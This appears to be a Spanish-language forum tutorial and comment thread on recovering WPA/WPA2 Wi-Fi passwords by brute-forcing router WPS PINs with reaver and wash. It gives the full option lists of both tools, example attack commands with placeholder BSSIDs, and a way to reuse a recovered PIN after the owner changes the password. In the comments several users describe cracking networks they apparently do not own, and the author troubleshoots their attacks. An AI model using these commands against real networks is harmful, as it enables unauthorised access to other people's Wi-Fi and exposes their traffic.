Required Arguments: -i, --interface=<iface> Interface to capture packets on -f, --file [FILE1 FILE2 FILE3 ...] Read packets from capture files
Optional Arguments: -c, --channel=<num> Channel to listen on [auto] -o, --out-file=<file> Write data to file -n, --probes=<num> Maximum number of probes to send to each AP in scan mode [15] -D, --daemonize Daemonize wash -C, --ignore-fcs Ignore frame checksum errors -5, --5ghz Use 5GHz 802.11 channels -s, --scan Use scan mode -u, --survey Use survey mode [default] -h, --help Show help
Example: wash -i mon0
*Anotamos los datos del wifi como el Access Point(B4:5D:3F:XX:XX:XX y canal y luego ejecutamos reaver Ejemplo: Uso: reaver -i mon0 -b 00:1D:CE:6F:XX:XX -vv
Required Arguments: -i, --interface=<wlan> Name of the monitor-mode interface to use -b, --bssid=<mac> BSSID of the target AP
Optional Arguments: -m, --mac=<mac> MAC of the host system -e, --essid=<ssid> ESSID of the target AP -c, --channel=<channel> Set the 802.11 channel for the interface (implies -f) -o, --out-file=<file> Send output to a log file [stdout] -s, --session=<file> Restore a previous session file -C, --exec=<command> Execute the supplied command upon successful pin recovery -D, --daemonize Daemonize reaver -a, --auto Auto detect the best advanced options for the target AP -f, --fixed Disable channel hopping -5, --5ghz Use 5GHz 802.11 channels -v, --verbose Display non-critical warnings (-vv for more) -q, --quiet Only display critical messages -h, --help Show help
Advanced Options: -p, --pin=<wps pin> Use the specified 4 or 8 digit WPS pin -d, --delay=<seconds> Set the delay between pin attempts [1] -l, --lock-delay=<seconds> Set the time to wait if the AP locks WPS pin attempts [60] -g, --max-attempts=<num> Quit after num pin attempts -x, --fail-wait=<seconds> Set the time to sleep after 10 unexpected failures [0] -r, --recurring-delay=<x:y> Sleep for y seconds every x pin attempts -t, --timeout=<seconds> Set the receive timeout period [5] -T, --m57-timeout=<seconds> Set the M5/M7 timeout period [0.20] -A, --no-associate Do not associate with the AP (association must be done by another application) -N, --no-nacks Do not send NACK messages when out of order packets are received -S, --dh-small Use small DH keys to improve crack speed -L, --ignore-locks Ignore locked state reported by the target AP -E, --eap-terminate Terminate each WPS session with an EAP FAIL packet -n, --nack Target AP always sends a NACK [Auto] -w, --win7 Mimic a Windows 7 registrar [False]
Example: reaver -i mon0 -b 00:90:4C:C1:AC:21 -vv
En mi caso me he tardado desde tres horas en sacar la clave wpa hasta 98 horas Aqui les dejo algunos screenshoots :
@MATONRAH hace 2 aos se ve interesante, mas alrato lo calare y te comento como me fue carnal, muchas gracias por el tuto!
@bt4777 hace 2 aos esta bien pero ami me sale warning failded associated me podrias ayudar por favor :S
@briansx_404 hace 2 aos Pero intentaste con wash -i mon0 ? aparecia el nombre de la red, puede que estes lejos del router o prueba agregando el canal
reaver -i mon0 -b 11:22:33:44:55:66 -c canal -vv
Saludos !
@bt4777 hace 2 aos briansx_404 dijo:Pero intentaste con wash -i mon0 ? aparecia el nombre de la red, puede que estes lejos del router o prueba agregando el canal
reaver -i mon0 -b 11:22:33:44:55:66 -c canal -vv
Saludos !
claro lo eh intentado en mon0 ya que wlan0 no podia entrar desde el principio desde airodump-ng y tube que probrar mon0
una duda mas esto es efectivo si la clave de defecto no esta cambiada?? un saludo!
@briansx_404 hace 2 aos No importa la clave este por defecto, ni que le pongan( ya sean numero,alfanumerica), igual la saca aqui tengo imagenes de el pass de un wifi que le han cambiado tres veces la clave que era wpa2
Reaver Tutorial [wpa/wpa2]
Reaver Tutorial [wpa/wpa2]
Reaver Tutorial [wpa/wpa2]
@bt4777 hace 2 aos a gracias entonces hoy mismo lo probare me ire de viaje y lo dejare en reaver q ver que pasa hahaha!
gracias por tu ayuda espero que mas adelante me ayuudes soy nuevo en esto jeje! un saludo!
@Pelillos93 hace 2 aos Lo intent probar una vez, pero no se cuantos paquetes haba que capturar para que el reaver pudiese sacar la contrasea.
Saludos.
@briansx_404 hace 2 aos no captura paquetes, intenta con un pin de 8 digitos y va avanzando por porciento % por ejemplo cuando ya tiene los primeros 4 digitos se salta a 90,91% osea que ya le falta poco por encontrar el pin de ahi saca el pass, una vez que tienes el pin y el dueo cambia la clave puedes usar el pin asi por ejemplo
reaver -i mon0 -b 00:11:22:33:44:55 -p 12345670 -vv donde 12345670 el pin que hayas sacado una vez y eso es todo el funcionamiento
@poyoregio hace 2 aos hola ya tengo el pin de un router d-link eso quiere decir que me evito hacer muchos pasos o hay que hacer todo desde el principio?, tambien tenia la clave wpa pero la cambiaron, con el pin que tengo puedo sacar la clave sin esperar tanto tiempo? y lo podria hacer desde wifiway 3.4 que ya trae reaver instalado?
@briansx_404 hace 2 aos es reaver -i mon0 -b 11:22:33:44:55 -p pinaqui -vv y que no se te olvide tener la targeta en modo monitor airmon-ng start wlan0 o wlan1 etc
@MATONRAH hace 1 ao ni habia regresado a comentar jaja, funciona al 100 carnal, ya te deje R+1, muchas gracias
@bt4777 hace 1 ao Hola bueno ami me funciono en un router WLAN_XXXX tengo otros por 69% 4% 6% 0.1% no los hago la verdad por que me da flojera pero funcionan
una pregunta mira hace tiempo tenia la clave de una red wifi WLAN_XXXX y la saque con un generador de claves de defecto y me fije que tenia el WPS activo entonces la cuestion seria como saber el pin del router por pongo la IP en el navegador y no puedo ver mas jjjej gracias y saludos a esta comu +10
@natilucha hace 1 ao copado!! probando: GRACIAS!!
@natilucha hace 1 ao problema: el backtrack 5 r2 desde live cd ya viene con el reaver 1.4, pero cuando lo ejecuto va brbaro, pero luego comienza a tenr problemas de asociacion, Associated with XX:XX:XX:XX:XX:XX [!] WARNING: Failed to associate with XX:XX:XX:XX:XX:XX [!] WARNING: Failed to associate with XX:XX:XX:XX:XX:XX [!] WARNING: Failed to associate with XX:XX:XX:XX:XX:XX (...) sera que el router se bloquea de mandar pines incorrectos?
@veguitah hace 1 ao hola en donde puedo descargar el reaver para instalarlo porfa ayuda...
@benjanp hace 1 ao Aqui esta la GUI para el reaver http://www.taringa.net/posts/linux/16097627/Reaver-Saver.html
@arnir hace 1 ao Orale lo probare habia intentando el de John de Ripper pero no me funciono usando BT5, la verdad no se que tanta diferencia hay entre este y el John cual recomiendas (por supuesto para una WPA2)?
@arnir hace 1 ao por cierto si es por fuerza bruta este metodo verdad? es que mi vecino me dijo en buen plan que si sacaba su contrasea me la podia quedar me amenazo con que tiene 25 caracteres y palabras en aleman cuanto me tardare?
@briansx_404 hace 1 ao +1 1.- Es fuerza bruta pero no se necesita handshake, es una vulnerabildad por wps, primero tienes que comprobar si el router es vulnerable(no todos tienen wps habilitado)
2.- Se demora de 3horas - 1dia En este caso, usando reaver no importa cuantas letras,numeros tenga lo que busca es un codigo de 8 digitos que tienen los routers, mira Reaver Tutorial [wpa/wpa2] http://sviehb.files.wordpress.com/2011/12/viehboeck_wps.pdf
3.- Si eres amigo de el puedes:
@Vidaure hace 1 ao pero como puedo saber si el router a auditar tiene el wps activado ?
@briansx_404 hace 1 ao +1 Con el comando
wash -i mon0 si te aparece el nombre de la red como aqui Reaver Tutorial [wpa/wpa2]
Es porque es vulnerable a wps Saludos.
@bt4777 hace 1 ao aalguien podria hacer un tuto para instalar WPS-crackgui 1.2.4 por fas con gambas incluido
@briansx_404 hace 1 ao sudo apt-get install gambas3 y sudo dpkg -i wpscrackgui
@pabheredia hace 11 meses tengo una duda... como se usan todos esos comandos que aparecen ahi? ya descarge el reaver desde la pagina que pusiste pero ahora no se que hacer, disculpa la ignorancia
@briansx_404 hace 11 meses Esta explicado paso a paso, solo tienes que copiar y pegar los comandos. Existe otro S.O llamado xiaopan OS bajalo y http://www.youtube.com/watch?v=WOqz6sKB5KY
@pabheredia hace 11 meses @briansx_404 ah ok gracias...
@JhonValdivia hace 10 meses hola men, por q cuando estoy usado el reaver, me sale el pin cambindose a cada rato de la victima es normal o es defensa del router?
@JhonValdivia hace 10 meses cuando aparece el wps locked (SI) no se puede atacar a ese router? o normal se puede? o especficamente tiene q mostrar wps locked (NO) para poder sacar su clave
@briansx_404 hace 10 meses No se esta cambiando, solo que reaver esta intentando buscar el pin correcto y te va indicando el pin que esta enviando al router. Cuando aparece [wps locked no] ahi si se puede intentar atacar. slds
@chemiscal hace 7 meses No me aparece cd reaver-1.4/src
@briansx_404 hace 7 meses +1 Escribe "ls" y ve que aparece, sino abre el explorador de archivos, descomprimes el archivo, entras a la carpeta, reaverxx , luego en la terminal escribes "cd " sin las comillas y con un espacio al final y luego arrastras la carpeta src que esta dentro de reaverxx y listo, aprietas enter . Saludos.
@Tano_cs hace 7 meses no entiendo como instalarlo
@Ieoshafat hace 3 meses Estimados....saque una clave wpa2, luego la cambiaron junto con su essid, pero ahora hace poco intente denuevo sacar la pass, pero solo llego al 3.75%, me fije cambio hasta el canal lo salve y al otro dia al seguir no reconocia el canal alguien me podria ayudar...gracias.
@raek_17_09 hace 2 meses Cuanto tiempo tarda en sacar la clave? yo estuve 3 horas y seguia en 1,80%
@voggio hace 2 meses Buen aporte bro, tengo una duda we, como lo instalo? tengo BackTrack5 en una maquina virtual??? AYUDA!!!! Tienes que ser miembro para responder en este tema